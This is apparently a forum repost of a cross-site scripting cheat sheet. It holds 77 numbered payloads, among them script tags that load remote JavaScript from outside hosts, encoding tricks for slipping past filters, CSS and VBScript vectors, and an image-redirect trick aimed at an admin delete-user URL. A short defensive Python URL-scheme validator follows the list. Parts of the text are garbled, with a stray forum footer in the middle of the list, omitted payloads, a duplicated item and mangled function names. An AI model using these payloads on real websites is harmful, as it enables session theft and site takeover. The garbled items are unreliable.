It seems there is relatively little material on XSS here on t00ls, so I'm copying over something good I came across, in case any of you want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Getting around length restrictions (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically do not work in China, because there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping filtered JavaScript
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57) XML namespace; the HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
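As an added, defensive illustration (my own code, not part of the original post or of the cheat sheet it copies): a Python check that undoes the obfuscations used in items (3) to (19) above (HTML entities with and without semicolons, embedded tab/newline/CR, null bytes, surrounding spaces, mixed case) before allowlisting the URL scheme of a src/href attribute, which is why a plain substring match on "javascript:" is the wrong tool. The function names, the allowlist and the sample values are assumptions constructed for this demonstration.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed samples mirroring items (3)-(19) above; the entity-encoded and
# control-character spellings are my own reconstructions of those items.
SAMPLES = {
    "mixed case (4)":           "JaVaScRiPt:alert('XSS')",
    "entities, semicolons (5)": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;"
                                "&#105;&#112;&#116;&#58;alert('XSS')",
    "hex, no semicolons (10)":  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72"
                                "&#x69&#x70&#x74&#x3A;alert('XSS')",
    "embedded tab (11)":        "jav\tascript:alert('XSS');",
    "embedded newline (13)":    "jav\nascript:alert('XSS');",
    "null byte (17)":           "java\x00script:alert(\"XSS\")",
    "leading space (19)":       " javascript:alert('XSS');",
    "benign absolute":          "http://example.com/a.png",
    "benign relative":          "/images/a.png",
}

# Hypothetical allowlist for src/href attributes; a denylist on the literal
# string "javascript:" is exactly what every item above gets around.
ALLOWED_SCHEMES = {"http", "https"}
# ASCII control characters (NUL, TAB, LF, CR, ...) that browsers discard
# from a URL before they resolve its scheme.
_CONTROLS = re.compile(r"[\x00-\x1f\x7f]")

def normalize_url_attr(value: str) -> str:
    """Apply the same steps the browser applies before the scheme is read:
    entity-decode (HTML parser), then drop controls and trim (URL parser)."""
    decoded = html.unescape(value)        # '&#106;' and '&#x6A' both -> 'j'
    decoded = _CONTROLS.sub("", decoded)  # 'jav\tascript' -> 'javascript'
    return decoded.strip()                # ' javascript:' -> 'javascript:'

def url_scheme(value: str) -> str:
    """Lower-cased scheme of the normalised value ('' for relative URLs)."""
    return urlsplit(normalize_url_attr(value)).scheme.lower()

def is_allowed_url(value: str) -> bool:
    """Allow relative URLs and http(s) only; javascript:, vbscript:, data:
    and every obfuscated spelling are rejected. A protocol-relative URL as in
    item (74) has no scheme and passes here; host checks are a separate step."""
    scheme = url_scheme(value)
    return scheme == "" or scheme in ALLOWED_SCHEMES

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:26} scheme={url_scheme(value)!r:13} allowed={is_allowed_url(value)}")
```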
Original source: http://fuzzexp.org/u/0day/?p=14